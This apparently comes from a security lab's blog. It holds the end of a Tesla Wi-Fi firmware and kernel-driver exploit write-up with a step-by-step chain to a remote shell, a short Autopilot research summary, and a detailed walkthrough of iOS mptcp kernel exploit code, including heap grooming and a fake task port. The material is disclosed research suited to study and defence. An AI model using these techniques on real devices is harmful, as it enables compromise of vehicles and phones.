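SOURCE = 0xC0016478
DESTINATIONS = [0xC000DC9B, 0xC000E49B, 0xC000EC9B, 0xC000F49B]
DMA_START, DMA_END = 0xC0021F90, 0xC0025790

def candidates(max_shifts=4):
    """Map each source/destination distance to the addresses whose data
    could land on g_interface_sdio after 1..max_shifts shifts."""
    table = {}
    for dst in DESTINATIONS:
        distance = SOURCE - dst
        table[distance] = [G_INTERFACE_SDIO + distance * k
                           for k in range(1, max_shifts + 1)]
    return table

def in_dma_buffer(addr):
    # End address treated as exclusive (assumption).
    return DMA_START <= addr < DMA_END

table = candidates()
hits = sorted(a for addrs in table.values() for a in addrs if in_dma_buffer(a))
for distance, addrs in table.items():
    print(hex(distance), [hex(a) for a in addrs])
```

Only the three-shift candidates for the first three distances fall inside the DMA buffer, which is why that buffer is the natural place to spray.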

To spray our fake pointers in memory, we send many normal 802.11 data frames full of fake pointers to the Wi-Fi chip. The DMA buffer is so large that we can spray our shellcode in it directly. To improve the success rate of the exploit, we used egg hunters to search for our shellcode.

If we successfully overwrite g_interface_sdio, the shellcode or egg hunter can be very close to 0xC000B818. The fake pointer we used is 0x41954, because there is a pointer 0xC000B991 at address 0x41954+0x24. Thus we can hijack $PC to 0xC000B991. At the same time, the bytes of the pointer 0x41954 can be interpreted as normal instructions.

54 19    ADDS R4, R2, R5
04 00    MOVS R4, R0
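
As a check on the listing above, the sketch below stores 0x41954 in little-endian order and decodes the two resulting 16-bit Thumb halfwords. The decoder is deliberately minimal and handles only the two encodings that occur here (register ADDS, and LSLS with a zero shift, which disassemblers show as MOVS); it is not a general disassembler.

```python
import struct

def decode_thumb16(hw):
    """Decode only the two 16-bit Thumb encodings needed for this example."""
    if hw >> 9 == 0b0001100:  # ADDS Rd, Rn, Rm
        rm, rn, rd = (hw >> 6) & 7, (hw >> 3) & 7, hw & 7
        return f"ADDS R{rd}, R{rn}, R{rm}"
    if hw >> 11 == 0 and (hw >> 6) & 0x1F == 0:  # LSLS Rd, Rm, #0
        rm, rd = (hw >> 3) & 7, hw & 7
        return f"MOVS R{rd}, R{rm}"
    return "unknown"

FAKE_POINTER = 0x41954
raw = struct.pack("<I", FAKE_POINTER)   # bytes as they sit in memory
halfwords = struct.unpack("<HH", raw)
listing = [decode_thumb16(hw) for hw in halfwords]
funb_slot = FAKE_POINTER + 0x24         # where the call target is read from
```

Both halfwords decode to harmless register operations, so if execution runs over the sprayed pointer bytes it can continue into whatever follows them.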

We achieved about a 25% success rate for code execution with this method.

Attack Host System

The vulnerability in the kernel driver can be triggered by sending data from the chip through the SDIO interface.

Normally, the command HostCmd_CMD_GET_MEM is initialized by the function wlan_get_firmware_mem().

In this case, pdata_buf points to a buffer allocated by kmalloc(), which makes the bug a kernel heap overflow. However, the function wlan_get_firmware_mem() cannot be called in the real environment, and a heap overflow is hard to exploit.

However, a compromised chip can return a result with a different command ID after receiving a command. The vulnerability can therefore be triggered while many other commands are being processed. In this situation, the vulnerability can be a heap overflow or a stack overflow, depending on where pdata_buf points. We found that the function wlan_enable_11d() uses the address of the local variable enable as pdata_buf, which lets us trigger a stack buffer overflow.
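The root cause described here is that the driver trusts the command ID and length reported by the chip. As a hedged illustration only, the sketch below shows the kind of check that would reject such a response. The structures, field names and function are hypothetical simplifications of ours and do not reproduce the Marvell driver's real data structures or its actual fix.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical, simplified view of a command the driver is waiting on. */
struct pending_cmd {
    uint16_t command;    /* command ID the driver sent */
    void    *pdata_buf;  /* where the response payload will be copied */
    size_t   pdata_len;  /* capacity of pdata_buf in bytes */
};

/* Hypothetical response from the chip; every field is untrusted. */
struct cmd_response {
    uint16_t       command;  /* command ID claimed by the chip */
    uint16_t       size;     /* payload length claimed by the chip */
    const uint8_t *payload;
};

/* Copy the response payload only if it answers the pending command and
 * fits the destination. Returns 0 on success, -1 if rejected. */
int handle_response(const struct pending_cmd *cmd,
                    const struct cmd_response *resp) {
    assert(cmd != NULL && resp != NULL);
    if (resp->command != cmd->command)  /* chip answered a different command */
        return -1;
    if (resp->size > cmd->pdata_len)    /* payload would overflow pdata_buf */
        return -1;
    memcpy(cmd->pdata_buf, resp->payload, resp->size);
    return 0;
}
```

With a check like this, a response carrying a mismatched command ID or an oversized payload never reaches a small buffer such as the address of a local variable.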

The function wlan_enable_11d() is called by wlan_11h_process_join(), so HostCmd_CMD_802_11_SNMP_MIB is used in the process of associating with an AP. The firmware vulnerability can only be triggered when Parrot is already connected to an AP, so by the time we get code execution in the chip, Parrot has already joined an AP. To trigger the stack buffer overflow in wlan_enable_11d(), the compromised chip needs to make the kernel driver believe that the chip has disconnected from the AP. The driver then launches a reconnection and sends the command HostCmd_CMD_802_11_SNMP_MIB to the firmware in wlan_enable_11d(). To launch the reconnection, the chip only needs to send the event EVENT_DISASSOCIATED to the driver.

After the vulnerability is triggered and we get code execution in the chip, the chip can no longer work properly, so our shellcode running in the chip needs to handle a series of commands while Parrot tries to reconnect to the original AP. The only command we need to handle before HostCmd_CMD_802_11_SNMP_MIB arrives is HostCmd_CMD_802_11_SCAN. Below is the whole process, from disassociation to triggering the kernel driver vulnerability.

The event and command packets can be sent directly by operating the registers SDIO_CardStatus and SDIO_SQReadBaseAddress0. The register SDIO_SQWriteBaseAddress0 at 0x80000114 is useful for processing the data received from the kernel driver.

Command Execute in Linux System

As Linux Kernel 2.6.36 does not support NX, it is possible to execute shellcode on the stack directly. In addition, the size field in the structure HostCmd_DS_COMMAND is a u16, so the shellcode can be large enough to do a lot of work.

After the vulnerability is triggered and $PC is under our control, $R7 points to the kernel stack, which makes it very convenient to jump to the shellcode.

The function run_linux_cmd in the shellcode calls the Usermode Helper API to execute Linux commands.

Get Shell Remotely

After the vulnerability in the chip is triggered, the whole RAM region is corrupted and the firmware can no longer work. In addition, the kernel stack is corrupted and needs to be repaired.

To make the wireless function of Parrot work properly again, we did the following:

1. After sending the kernel payload through the SDIO interface, we reset the chip by running the following code. Later, the kernel driver finds the chip and downloads the firmware again.

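/* MMIO register writes from the original exploit that reset the chip */
*(volatile unsigned int *)0x8000201c |= 2;
*(volatile unsigned int *)0x8000a514 = 0;
*(volatile unsigned int *)0x80003034 = 1;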

2. Call the kernel function rtnl_unlock() in the shellcode function fun_ret() to unlock rtnl_mutex, which was locked before wlan_enable_11d() was called. Otherwise, the wireless function in Linux hangs, which results in Parrot being rebooted by CID.

3. Call the kernel function do_exit() in the shellcode function fun_ret() to kill the user-mode process wpa_supplicant and then restart it, so we don’t need to repair the kernel stack.

4. Kill the process ck5050 and start it again. Otherwise, ck5050 hits a segmentation fault because of the chip reset, which results in Parrot being rebooted by CID.

To get a shell remotely, we force Parrot to connect to our AP and alter the iptables rules. The shell listening on port 23 can then be reached.

Finally, the success rate of getting a shell is about 10%.

Complete Exploit process

1. The attacker sends DEAUTH frames to all the APs nearby.
2. When Tesla reconnects to the AP, the attacker gets the MAC address of Tesla.
3. The attacker sprays the fake pointers, then triggers the vulnerability in the firmware by directly sending a corrupt Action Frame.
4. The function memcpy() executes until an interrupt occurs.
5. The attacker gains code execution in the Wi-Fi chip.
6. Stage 1 shellcode sends the event EVENT_DISASSOCIATED to the driver.
7. Stage 1 shellcode handles some commands and waits for the command HostCmd_CMD_802_11_SNMP_MIB.
8. Stage 1 shellcode sends the payload through the SDIO interface to trigger the kernel stack overflow.
9. Stage 2 shellcode executes and invokes the kernel function call_usermodehelper().
10. The Linux system commands execute and try to fix the wireless function of Parrot.
11. The attacker sets up an AP and a DHCP server on this AP.
12. A Linux system command forces Parrot to join our AP and alters the iptables rules.
13. The attacker can telnet to port 23 on Parrot.

Conclusion

In this article, we presented the details of the vulnerability in the firmware and the vulnerability in the Marvell kernel driver and explained how to utilize these two vulnerabilities to compromise the Parrot Linux system by just sending malicious packets from a normal Wi-Fi dongle.

Responsible disclosure

Both vulnerabilities presented above were reported to Tesla in March 2019. Tesla has already fixed them in version 2019.36.2, and Marvell has also deployed a fix and published a security advisory[4] for the issue. The disclosure of this vulnerability research report was communicated to Tesla, and Tesla is aware of our release.


References

[1] https://fccid.io/RKXFC6050W/Users-Manual/user-manual-1707044

[2] https://www.marvell.com/wireless/88w8688/

[3] https://www.marvell.com/wireless/assets/Marvell-88W8688-SoC.pdf

[4] https://www.marvell.com/documents/ioaj5dntk2ubykssa78s/

TenSec 2019

2019-05-24T06:00:00.000Z

Tencent Security Conference (TenSec) is an international cybersecurity summit launched by Tencent Security, hosted by Tencent Keen Security Lab and Tencent Security Platform Department, and co-organized by Tencent Security Academy.

Over the last three years, we have invited top experts from the international security field, focusing on Big Data, AI, Mobile Internet, Cloud Computing, Blockchain, Virtualization and Connected Vehicles, as well as security domains such as Research Instruments. TenSec is committed to exploring international cutting-edge security technologies and building a long-lasting platform for communication and cooperation in the global security field, to jointly safeguard emerging Internet businesses and user security.

**Tencent Security will host TenSec 2019, Tuesday, June 11th - Wednesday, June 12th at The WEST BUND ShangHai XuHui.**

Tencent Keen Security Lab: Experimental Security Research of Tesla Autopilot

2019-03-29T02:50:00.000Z

Introduction

With the rise of Artificial Intelligence, Advanced Driver Assistance System (ADAS) related technologies are under rapid development in the vehicle industry. Meanwhile, the security and safety of ADAS have also received extensive attention.

As a world-leading security research team, Tencent Keen Security Lab has been conducting continuous research in this area. At the Black Hat USA 2018 security conference, Keen Lab presented the first ever demonstration of remotely compromising the Autopilot[1] system on a Tesla Model S (the attack chain was fixed immediately after we reported it to Tesla)[2].

In its later security research on ADAS technologies, Keen Lab has focused on areas such as the security of the AI models in the visual perception system and the architectural security of the Autopilot system. Through in-depth experimental research on Tesla Autopilot, we obtained the following three findings.

Research Findings

Auto-wipers Vision Recognition Flaw

Tesla Autopilot can identify wet weather through image recognition technology and then turn on the wipers if necessary. Our research shows that an adversarial example carefully crafted in the physical world can interfere with the system, causing it to return an “improper” result and turn on the wipers.

Lane Recognition Flaw

Tesla Autopilot recognizes lanes and assists control by identifying road traffic markings. In our research, we proved that when interference stickers are placed on the road, the Autopilot system captures this information and makes an abnormal judgement, which causes the vehicle to enter the reverse lane.

Control Steering System with a Gamepad

After compromising the Autopilot system on the Tesla Model S (ver 2018.6.1), Keen Lab further proved that we can control the steering system through the Autopilot system with a wireless gamepad, even when the Autopilot system is not activated by the driver.

Research Demonstration

Please find our research video below for the demonstration, or click here to see the video.

Technical Research Paper

For more technical details of our research, please refer to the following link: Experimental Security Research of Tesla Autopilot.pdf

Feedback from Tesla

Tesla’s feedback on Autowipers:

“This research was demonstrated by displaying an image on a TV that was placed directly in front of the windshield of a car. This is not a real-world situation that drivers would face, nor is it a safety or security issue. Additionally, as we state in our Owners’ Manual, the ‘Auto setting [for our windshield wipers] is currently in BETA.’ A customer can also elect to use the manual windshield wiper setting at any time.”

Tesla’s feedback on Lane Recognition:

“In this demonstration the researchers adjusted the physical environment (e.g. placing tape on the road or altering lane lines) around the vehicle to make the car behave differently when Autopilot is in use. This is not a real-world concern given that a driver can easily override Autopilot at any time by using the steering wheel or brakes and should be prepared to do so at all times.”

Tesla’s feedback for the “Control Steering System with a Gamepad” Research:

“The primary vulnerability addressed in this report was fixed by Tesla through a robust security update in 2017, followed by another comprehensive security update in 2018, both of which we released before this group reported this research to us. In the many years that we have had cars on the road, we have never seen a single customer ever affected by any of the research in this report.”

About Tencent Keen Security Lab

Tencent Keen Security Lab (abbreviated as “Keen Lab”) is a professional security research team under Tencent, focusing on information security research into both attack and protection techniques. In past years, Keen Lab has built security research partnerships with global manufacturers in the software, hardware, and internet industries, and achieved many world-leading security research results.

Since 2015, Keen Lab has run research projects in the IoT[3] and Connected Vehicle[4,5,6] categories and built partnerships with manufacturers in the IoT and car industries. In 2016 and 2017, Keen Lab published its globally known research on “Tesla Model S and Model X Remote Hacking”, following the “Responsible Disclosure” practice to report the vulnerabilities and attack chains to Tesla.

[1] https://www.tesla.com/autopilot
[2] https://www.blackhat.com/us-18/briefings/schedule/#over-the-air-how-we-remotely-compromised-the-gateway-bcm-and-autopilot-ecus-of-tesla-cars-10806
[3] https://keenlab.tencent.com/zh/2017/04/01/remote-attack-on-mi-ninebot/
[4] https://keenlab.tencent.com/en/2016/09/19/Keen-Security-Lab-of-Tencent-Car-Hacking-Research-Remote-Attack-to-Tesla-Cars/
[5] https://keenlab.tencent.com/en/2017/07/27/New-Car-Hacking-Research-2017-Remote-Attack-Tesla-Motors-Again/
[6] https://keenlab.tencent.com/zh/2018/05/22/New-CarHacking-Research-by-KeenLab-Experimental-Security-Assessment-of-BMW-Cars/

Exploiting iOS 11.0-11.3.1 Multi-path-TCP: A walk through

2018-07-19T14:30:23.000Z

Introduction

The iOS 11 mptcp bug (CVE-2018-4241) discovered by Ian Beer is a serious kernel vulnerability which involves a buffer overflow in mptcp_usr_connectx that allows attackers to execute arbitrary code in a privileged context.

Ian Beer attached an interesting piece of PoC code which demonstrated a rather elegant technique to obtain the kernel task port with this vulnerability. Extending the brief writeup that comes with the PoC, this blog post mainly aims to walk through the PoC in great detail and to cover its background. If you are an iOS security researcher who hasn’t looked into the PoC source code yet, hopefully you will find the material handy when you decide to do so.

Please have a copy of mptcp PoC code before we dive in! You can download it from here: Download

Note: All credits for exploitation techniques, vulnerability PoC code and original writeup belong to Ian Beer at Google Project Zero.

The Vulnerability

Let’s first take a quick look at the offending code in mptcp_usr_connectx(), which is the handler for the connectx syscall for the AF_MULTIPATH socket family:

if (src) {
    // verify sa_len for AF_INET
    if (src->sa_family == AF_INET &&
        src->sa_len != sizeof(mpte->__mpte_src_v4)) {
        mptcplog((LOG_ERR, "%s IPv4 src len %u\n", __func__,
                  src->sa_len),
                 MPTCP_SOCKET_DBG, MPTCP_LOGLVL_ERR);
        error = EINVAL;
        goto out;
    }

    // verify sa_len for AF_INET6
    if (src->sa_family == AF_INET6 &&
        src->sa_len != sizeof(mpte->__mpte_src_v6)) {
        mptcplog((LOG_ERR, "%s IPv6 src len %u\n", __func__,
                  src->sa_len),
                 MPTCP_SOCKET_DBG, MPTCP_LOGLVL_ERR);
        error = EINVAL;
        goto out;
    }

    // code doesn't bail if sa_family is neither AF_INET nor AF_INET6
    if ((mp_so->so_state & (SS_ISCONNECTED|SS_ISCONNECTING)) == 0) {
        memcpy(&mpte->mpte_src, src, src->sa_len);
    }
}

The code does not validate the sa_len field if src->sa_family is neither AF_INET nor AF_INET6, so the function falls straight through to memcpy with a user-specified sa_len value of up to 255 bytes.
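For contrast, here is a minimal sketch of a check that closes the gap by rejecting any family it does not explicitly know. It is not Apple's patch. The struct and constants are local stand-ins defined for this example (the values are chosen to resemble Darwin's but are assumptions of the sketch), so it compiles on systems whose `struct sockaddr` has no `sa_len` field.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Stand-in constants for illustration only; not taken from XNU headers. */
enum { DEMO_AF_INET = 2, DEMO_AF_INET6 = 30 };
enum { DEMO_SIN_LEN = 16, DEMO_SIN6_LEN = 28 };

struct demo_sockaddr {
    uint8_t sa_len;     /* total length claimed by the caller (0..255) */
    uint8_t sa_family;
    char    sa_data[14];
};

/* Returns 1 if src has a known family and the exact length expected for
 * it, 0 otherwise. Unknown families are rejected outright. */
int demo_src_is_valid(const struct demo_sockaddr *src) {
    assert(src != NULL);
    switch (src->sa_family) {
    case DEMO_AF_INET:
        return src->sa_len == DEMO_SIN_LEN;
    case DEMO_AF_INET6:
        return src->sa_len == DEMO_SIN6_LEN;
    default:
        return 0; /* the case the vulnerable code let through */
    }
}
```

The important design point is the `default` branch: the length checks in the vulnerable code were each guarded by a family test, so an unexpected family skipped both of them.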

Background

Kernel zone heap allocator

To oversimplify a bit, kernel heap memory is divided into zones, and within one zone all allocations are of the same size. For each zone, the kernel keeps four doubly-linked lists to categorize each page by memory availability, namely:

struct {
  queue_head_t any_free_foreign;  
  queue_head_t all_free;
  queue_head_t intermediate;
  queue_head_t all_used;
} pages;

When a memory allocation is requested, the intermediate page list is traversed before the all_free list, and a free memory block is returned from the first available page.
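The ordering matters for the exploit, because a page that has just had one element freed is preferred over untouched pages. The toy model below illustrates only that ordering. It is a sketch under our own simplifications: pages live in a flat array rather than in linked lists, the any_free_foreign list is ignored, and all names are invented for the example.

```c
#include <assert.h>
#include <stddef.h>

enum page_list { LIST_ALL_FREE, LIST_INTERMEDIATE, LIST_ALL_USED };

struct demo_page {
    int id;
    int free_elems;  /* free elements left on this page */
    int total_elems; /* elements the page can hold */
};

/* Classify a page the way the per-zone lists categorize it. */
enum page_list classify(const struct demo_page *p) {
    assert(p->free_elems >= 0 && p->free_elems <= p->total_elems);
    if (p->free_elems == p->total_elems)
        return LIST_ALL_FREE;
    if (p->free_elems == 0)
        return LIST_ALL_USED;
    return LIST_INTERMEDIATE;
}

/* Take one element from the zone: partially used pages are tried first,
 * then fully free ones. Returns the page id, or -1 if nothing is free. */
int zone_alloc(struct demo_page *pages, size_t n) {
    static const enum page_list order[] = {LIST_INTERMEDIATE, LIST_ALL_FREE};
    for (size_t o = 0; o < sizeof(order) / sizeof(order[0]); o++) {
        for (size_t i = 0; i < n; i++) {
            if (classify(&pages[i]) == order[o]) {
                pages[i].free_elems--;
                return pages[i].id;
            }
        }
    }
    return -1;
}
```

In this model, a partially used page is picked even when a completely free page appears earlier in the array, which is the behavior the heap grooming later relies on.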

Preallocated ipc_kmsg buffer

ipc_port has a struct ipc_kmsg *premsg member that points to an optional preallocated ipc_kmsg buffer. The intended use case is to allow user space to receive critical messages without the kernel having to make a heap allocation. Each time the kernel sends a real mach message it first checks whether the port has one of these preallocated buffers. In addition, this kernel heap buffer will not be freed after the message gets delivered to user space. Ian Beer uses this fact to increase the stability of the exploit.

Mach exception port

Mach provides an IPC-based exception-handling facility wherein exceptions are converted to messages. A thread or task can register one or multiple mach ports as so-called “exception port” to receive information about an exception. When an exception occurs, a message containing information about the exception is sent to the exception port. In this way, together with a mach port with preallocated ipc_kmsg buffer, we can force the kernel to send data to a deterministic location in the heap. Furthermore, we can also partially control the content of the message by manipulating the register state at the time of the exception, which will be dutifully carried over in the message by the kernel.

For more information about preallocated messages and the exception handling mechanism, readers are advised to check out Ian Beer’s excellent writeup on the iOS 10 extra-recipe bug here, as well as Chapter 9.7 in Amit Singh’s seminal Mac OS X Internals.

Ok, let’s now dig in!

Finding the target

By passing in a src with an unexpected sa_family, we are now able to overflow inside mpte, a mptses structure, with sa_len bytes of attacker-controlled data. Here is the struct declaration in /bsd/netinet/mptcp_var.h:

struct mptses {
    ...

    union {
        struct sockaddr     mpte_src;  // The field we are overflowing out of
        struct sockaddr_in  __mpte_src_v4;
        struct sockaddr_in6 __mpte_src_v6;
    };

    union {
        struct sockaddr     mpte_dst;
        struct sockaddr_in  __mpte_dst_v4;
        struct sockaddr_in6 __mpte_dst_v6;
    };
    ...

#define MPTE_ITFINFO_SIZE 4
    uint32_t            mpte_itfinfo_size;
    struct mpt_itf_info _mpte_itfinfo[MPTE_ITFINFO_SIZE];
    struct mpt_itf_info *mpte_itfinfo;
    ...
};

Here, the mpte_itfinfo is particularly interesting because it’s a pointer… keep digging in references to mpte_itfinfo… oh snap!

if (mpte->mpte_itfinfo_size > MPTE_ITFINFO_SIZE)
    _FREE(mpte->mpte_itfinfo, M_TEMP);

In mptcp_session_destroy, the address pointed to by mpte_itfinfo is freed, and mpte_itfinfo_size is under our complete control too! Moreover, we don’t need to know a priori the size of the object we would like to _FREE, because kfree_addr() will look up the size from the memory zone struct in which the object resides. (_FREE is just a macro around kfree_addr().)

This is just too good to be true.

Set up the heap

To turn this overflow into something actually useful, it’s time for some heap Feng Shui. The end goal here is to have an ipc_kmsg and a pipe buffer overlapping with each other so that we can write to and read from it. In the PoC, Ian Beer chooses to overwrite the lower 3 bytes of mpte_itfinfo with 0x000000, after which it will point to a 16MB aligned page boundary.
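The alignment claim follows from the pointer being stored little-endian: the three lowest-addressed bytes are the 24 least significant bits, and 2^24 bytes is 16MB. A minimal sketch of that arithmetic (the helper name is ours):

```c
#include <assert.h>
#include <stdint.h>

/* Emulate overwriting the lowest n_bytes bytes of a little-endian 64-bit
 * pointer with zeros, as the partial overflow does. */
uint64_t zero_low_bytes(uint64_t ptr, unsigned n_bytes) {
    assert(n_bytes < 8);
    uint64_t mask = (1ULL << (8 * n_bytes)) - 1;
    return ptr & ~mask;
}
```

For example, clearing three bytes of the made-up pointer 0xffffffe012345678 gives 0xffffffe012000000, which is a multiple of 0x1000000 (16MB).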

In order to have an ipc_kmsg sitting right at that 16MB boundary, the code alternately allocates 16MB of ipc_kmsg buffers and a bunch of mptcp sockets in the kernel heap. The former is done by allocating fake mach ports and sending mach messages of a calculated size to each port, during which mach_msg(...MACH_SEND_MSG...) allocates a kernel heap buffer for us and copies in the message from user space. This technique allows us to effectively do the same thing as kalloc, but from outside the kernel. We are also able to control the memory zone for the ipc_kmsg, since all it takes is to work backward and calculate the msgh_size from the kalloc size we would like to achieve. In the PoC, Ian Beer chose to place the ipc_kmsgs in the kalloc.2048 zone.

// a few times do:
  // alloc 16MB of messages
  // alloc a hundred sockets
  printf("trying to force a 16MB aligned 0x800 kalloc on to freelist\n");
  for (int i = 0; i < 7; i++) {
    printf("%d/6...\n", i);
    for (int j = 0; j < 0x2000; j++) {
      mach_port_t p = fake_kalloc(0x800); // kalloc.2048 zone block size
    }
    for (int j = 0; j < 100; j++) {
      int sock = alloc_mptcp_socket();
      
      // we'll keep two of them:
      if (i == 6 && (j==94 || j==95)) {
        target_socks[next_sock] = sock;
        next_sock++;
        next_sock %= (sizeof(target_socks)/sizeof(target_socks[0]));
      } else {
        sockets[next_all_sock++] = sock;
      }
    }
  }
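The inner loop bound of 0x2000 is what makes each round cover 16MB: 0x2000 blocks of 0x800 bytes is exactly 0x1000000 bytes. A one-function sketch of that calculation, with a helper name of our own choosing:

```c
#include <assert.h>
#include <stdint.h>

/* Number of fixed-size blocks needed to cover `span` bytes, rounded up. */
uint64_t blocks_to_cover(uint64_t span, uint64_t block_size) {
    assert(block_size != 0);
    return (span + block_size - 1) / block_size;
}
```

Here `blocks_to_cover(16ULL << 20, 0x800)` evaluates to 0x2000, the count used in the loop above.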

Trigger the bug

The code in do_partial_kfree_with_socket triggers the bug, overwriting the lower 3 bytes of mpte_itfinfo with NULL bytes. Hopefully the heap now looks somewhat like the diagram shown below. Fingers crossed! 🤞

void do_partial_kfree_with_socket(int fd, uint64_t kaddr, uint32_t n_bytes) {
  struct sockaddr* sockaddr_src = malloc(256);
  memset(sockaddr_src, 'D', 256);
  *(uint64_t*) (((uint8_t*)sockaddr_src)+koffset(KFREE_ADDR_OFFSET)) = kaddr;
  sockaddr_src->sa_len = koffset(KFREE_ADDR_OFFSET)+n_bytes;
  sockaddr_src->sa_family = 'B'; // An abnormal sa_family 
  
  struct sockaddr* sockaddr_dst = malloc(256);
  memset(sockaddr_dst, 'C', 256);
  sockaddr_dst->sa_len = sizeof(struct sockaddr_in6);
  sockaddr_dst->sa_family = AF_INET6;
  
  sa_endpoints_t eps = {0};
  eps.sae_srcif = 0;
  eps.sae_srcaddr = sockaddr_src;
  eps.sae_srcaddrlen = koffset(KFREE_ADDR_OFFSET)+n_bytes;
  eps.sae_dstaddr = sockaddr_dst;
  eps.sae_dstaddrlen = sizeof(struct sockaddr_in6);
  
  printf("doing partial overwrite with target value: %016llx, length %d\n", kaddr, n_bytes);
  
  int err = connectx(
                     fd,
                     &eps,
                     SAE_ASSOCID_ANY,
                     0,
                     NULL,
                     0,
                     NULL,
                     NULL);

  
  printf("err: %d\n", err);
  
  close(fd); // Trigger the _FREE, but need to wait for mptcp_gc
  
  
  return;
}

After we point mpte_itfinfo to the 16MB boundary, we can trigger the _FREE by just closing the socket.

One caveat is that we need to wait for mptcp_gc, because mpte_itfinfo is not _FREE’ed immediately after the socket is closed, as evidenced by the comment on this function in /xnu-4570.41.2/bsd/netinet/mptcp_subr.c:

/*
 * MPTCP garbage collector.
 *
 * This routine is called by the MP domain on-demand, periodic callout,
 * which is triggered when a MPTCP socket is closed.  The callout will
 * repeat as long as this routine returns a non-zero value.
 */
static uint32_t
mptcp_gc(struct mppcbinfo *mppi)
{
...
    mptcp_session_destroy(mpte); // mpte_itfinfo is _FREE'ed here
...
    return (active);
}

printf("waiting for second mptcp gc...\n");
// wait for the mptcp gc...
for (int i = 0; i < 400; i++) {
  usleep(10000);
}

After the _FREE, hopefully one of the ipc_kmsg buffers is now freed and its page is put on the intermediate list.

Allocate pipes

Next, we allocate a bunch of pipes and write 2047 bytes of data to the write end of each one. The backing buffers for these pipes will come from kalloc.2048, hopefully including our 16MB-aligned address:

Trigger the bug again

Trigger the bug a second time to _FREE the underlying pipe buffer and put the page on the intermediate page list again.

After overflow:

After _FREE:

Allocate more mach ports!

Next, we allocate a bunch of mach ports with preallocated ipc_kmsg buffers from the kalloc.2048 zone, using mach_port_allocate_full() and passing in the size as a member of the mach_port_qos_t parameter. The desired size for the preallocated buffer is 2048 bytes, which places it in the kalloc.2048 zone. Hopefully, one of them picks up the space we just _FREE’ed.

We then insert a SEND RIGHT to every mach port we allocated in this step, as each one will be registered as another thread’s exception port later.

Catching the pipe

As shown on the diagram above, ideally now we have an ipc_kmsg (which we can get messages sent to and then receive) and a pipe buffer (which we can read and write) overlapping each other.

We now need to find out which one of the hundreds of pipes we allocated a while ago is on that spot.

int find_replacer_pipe(void** contents) {
  uint64_t* read_back = malloc(PIPE_SIZE);
  for (int i = 0; i < next_read_fd; i++) {
    int fd = read_fds[i];
    ssize_t amount = read(fd, read_back, PIPE_SIZE);
    if (amount != PIPE_SIZE) {
      printf("short read (%ld)\n", amount);
    } else {
      printf("full read\n");
    }
    
    int pipe_is_replacer = 0;
    for (int j = 0; j < PIPE_SIZE/8; j++) {
      if (read_back[j] != 0x4242424242424242) { // Is the content still "BBBBBBBB"?
        pipe_is_replacer = 1;
        printf("found an unexpected value: %016llx\n", read_back[j]);
      }
    }
    
    if (pipe_is_replacer) {
      *contents = read_back;
      return fd;
    }
  }
  return -1;
}

The technique Ian Beer used here is simply to read from each pipe and compare the content read with the original data we piped into the buffer, BBBBBBBB (0x4242424242424242 in hex). If they differ, the underlying buffer has been overwritten by a newly allocated ipc_kmsg.

If we can’t find a pipe satisfying this condition it simply means there is no overlapping, and we just have to restart and wish ourselves better luck next time.

Catching the port

Now, we need to figure out which port owns the preallocated ipc_kmsg buffer. To do that, we need to somehow persuade the kernel into overwriting the preallocated kmsg with something different so that we can compare the content again and spot the difference.

Ian Beer’s technique in the PoC is to register each port as an exception port for a thread and intentionally raise an exception on that thread, causing the kernel to send a kmsg to the buffer, and then immediately compare the content by reading from the pipe. This is ingenious.

for (int i = 0; i < 100; i++) {
    send_prealloc_msg(exception_ports[i]);
    // read from the pipe and see if the contents changed:

Let’s walk through send_prealloc_msg() step by step.

1. Start a thread

pthread_create(&t, NULL, do_thread, (void*)port);

2. Register exception port

void* do_thread(void* arg) {
  mach_port_t exception_port = (mach_port_t)arg;
  
  kern_return_t err;
  err = thread_set_exception_ports(
                                   mach_thread_self(),
                                   EXC_MASK_ALL,
                                   exception_port,
                                   EXCEPTION_STATE_IDENTITY, // catch_exception_raise_state_identity messages
                                   ARM_THREAD_STATE64);

3. Substitute thread port with a host port

// make the thread port which gets sent in the message actually be the host port
err = thread_set_special_port(mach_thread_self(), THREAD_KERNEL_PORT, mach_host_self());

4. Crash the thread

// cause an exception message to be sent by the kernel
  volatile char* bAAAAd_ptr = (volatile char*)0x41414141;
  *bAAAAd_ptr = 'A';
// Now the thread is crashed

After the thread crashes, a message containing the exception information is sent to our ipc_kmsg buffer, waiting to be received and processed by the port. We can now read from the pipe and compare the content.

ssize_t amount = read(replacer_pipe, new_contents, PIPE_SIZE);
    if (amount != PIPE_SIZE) {
      printf("short read (%ld)\n", amount);
    }
    if (memcmp(original_contents, new_contents, PIPE_SIZE) == 0) {
      // they are still the same, this isn't the correct port:
      ...
    } else {
      // different! we found the right exception port which has its prealloced port overlapping
      replacer_port = exception_ports[i];

      break;
    }
  }

At this point, we have fully discovered the overlapping pipe, port pair.

We also need to save the kernel address for the host port and our task port for later:

// We will get kernel ipc_space address from this later
uint64_t host_port_kaddr = *((uint64_t*)(new_contents + 0x66c));

// Need this for cleaning up mach port table
uint64_t task_port_kaddr = *((uint64_t*)(new_contents + 0x67c));

Build fake task port

Before we receive the exception message into user space, we want to build a fake task port to allow an early arbitrary kernel read.

build_fake_task_port(original_contents+fake_port_offset, fake_port_kaddr, early_read_pipe_buffer_kaddr, 0, 0);

We can do this by mimicking the structure of a proper task port:

#define IO_BITS_ACTIVE 0x80000000
#define IKOT_TASK 2
#define IKOT_NONE 0

void build_fake_task_port(uint8_t* fake_port, uint64_t fake_port_kaddr, uint64_t initial_read_addr, uint64_t vm_map, uint64_t receiver) {
  // clear the region we'll use:
  memset(fake_port, 0, 0x500);
  
  *(uint32_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS)) = IO_BITS_ACTIVE | IKOT_TASK;
  *(uint32_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES)) = 0xf00d; // leak references
  *(uint32_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS)) = 0xf00d; // leak srights
  *(uint64_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER)) = receiver;
  *(uint64_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT)) = 0x123456789abcdef;
  
  
  uint64_t fake_task_kaddr = fake_port_kaddr + 0x100;
  *(uint64_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)) = fake_task_kaddr;
  
  ...
}

and shoving it into our ipc_kmsg buffer with our replacer_pipe.

